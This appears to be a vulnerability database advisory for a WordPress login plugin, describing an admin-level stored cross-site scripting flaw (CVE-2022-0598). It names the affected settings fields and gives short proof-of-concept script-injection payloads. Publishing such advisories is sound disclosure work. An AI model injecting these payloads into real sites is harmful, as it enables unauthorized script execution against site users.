Lucene search
Michal LipinskiWPEX-ID:4688D39E-AC9B-47F5-A4C1-F9548B63C68CHistoryJul 05, 2022 - 12:00 a.m.
Login with phone number < 1.3.8 - Multiple Admin+ Stored XSS
2022-07-0500:00:00
Michal Lipinski
130
stored xss
multiple admin
plugin settings
input field
exploit
login form
phone number.
EPSS
0.001
Percentile
24.8%
The plugin does not sanitise and escape plugin settings which could allow high privilege users to perform Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed.
Plugin settings > Style Settings > button border radius (or other field) put to input field: </style><script>alert('XSS');</script><!--
Plugin settings > Text & localizations > Title of login form put to input field: <script>alert('XSS');</script>Related
prion
prion
Cross site scripting
2022-08-01 13:15:00
wpvulndb
wpvulndb
Login with phone number < 1.3.8 - Multiple Admin+ Stored XSS
2022-07-05 00:00:00
cve
cve
CVE-2022-0598
2022-08-01 13:15:09
nvd
nvd
CVE-2022-0598
2022-08-01 13:15:09
cvelist
cvelist
CVE-2022-0598 Login with phone number < 1.3.8 - Multiple Admin+ Stored XSS
2022-08-01 12:47:18